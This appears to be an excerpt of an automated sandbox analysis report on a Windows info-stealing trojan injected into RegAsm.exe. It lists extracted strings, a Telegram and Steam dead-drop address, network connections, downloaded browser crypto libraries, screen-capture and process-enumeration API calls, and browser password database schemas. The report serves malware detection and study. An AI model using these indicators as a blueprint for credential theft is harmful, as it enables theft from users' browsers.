                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp, CAFHIJDH.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: CAFHIJDH.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp, CAFHIJDH.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: CAFHIJDH.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                        Source: file.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfail
                        Source: file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfailAt
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: GDHIEHJE.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: GDHIEHJE.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                        Source: JJJDGIECFCAKKFHIIIJEGDHIIE.5.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 184.30.122.179:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,5_2_00411D10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,5_2_6C81ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C85B8C0 rand_s,NtQueryVirtualMemory,5_2_6C85B8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,5_2_6C85B910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,5_2_6C85B700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,5_2_6C7FF280
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D4C600_2_003D4C60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ACF90_2_0040ACF9
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DCF9B0_2_003DCF9B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D30920_2_003D3092
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B24A0_2_0040B24A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D3800_2_0040D380
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CF6800_2_003CF680
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DB7360_2_003DB736
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B79B0_2_0040B79B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CB9620_2_003CB962
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE770_2_0040BE77
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041D38A5_2_0041D38A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041F4C05_2_0041F4C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CE395_2_0041CE39
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041DFB75_2_0041DFB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7F35A05_2_6C7F35A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C806C805_2_6C806C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C836CF05_2_6C836CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C86AC005_2_6C86AC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C835C105_2_6C835C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C842C105_2_6C842C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C830DD05_2_6C830DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C80FD005_2_6C80FD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81ED105_2_6C81ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C815E905_2_6C815E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C854EA05_2_6C854EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C80FEF05_2_6C80FEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FBEF05_2_6C7FBEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C837E105_2_6C837E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C859E305_2_6C859E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C842E4E5_2_6C842E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C819E505_2_6C819E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C833E505_2_6C833E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C866E635_2_6C866E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C826FF05_2_6C826FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C809F005_2_6C809F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FDFE05_2_6C7FDFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8358E05_2_6C8358E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8078105_2_6C807810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C83B8205_2_6C83B820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8448205_2_6C844820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8188505_2_6C818850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81D8505_2_6C81D850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8529905_2_6C852990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82D9B05_2_6C82D9B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81A9405_2_6C81A940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FC9A05_2_6C7FC9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C80D9605_2_6C80D960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C84B9705_2_6C84B970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C86BA905_2_6C86BA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C824AA05_2_6C824AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C80CAB05_2_6C80CAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C862AB05_2_6C862AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C838AC05_2_6C838AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C811AF05_2_6C811AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C839A605_2_6C839A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8534A05_2_6C8534A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C85C4A05_2_6C85C4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8064C05_2_6C8064C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81D4D05_2_6C81D4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FD4E05_2_6C7FD4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C86542B5_2_6C86542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8054405_2_6C805440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C86545C5_2_6C86545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8585F05_2_6C8585F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8205125_2_6C820512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C85E6805_2_6C85E680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FC6705_2_6C7FC670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8676E35_2_6C8676E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8456005_2_6C845600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8146405_2_6C814640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8477A05_2_6C8477A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8377105_2_6C837710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8260A05_2_6C8260A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8650C75_2_6C8650C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C81C0E05_2_6C81C0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C83F0705_2_6C83F070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8351905_2_6C835190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C86B1705_2_6C86B170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C83E2F05_2_6C83E2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7F22A05_2_6C7F22A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7F53405_2_6C7F5340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C8653C85_2_6C8653C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C83D3205_2_6C83D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C80C3705_2_6C80C370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C7FF3805_2_6C7FF380
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 003C6A00 appears 49 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C82CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402360 appears 286 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8394D0 appears 90 times
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/25@1/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,5_2_6C857030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,5_2_00410AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,5_2_00411020
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htmJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sqln[1].dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: GDAAKFIDGIEGDGDHIDAK.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
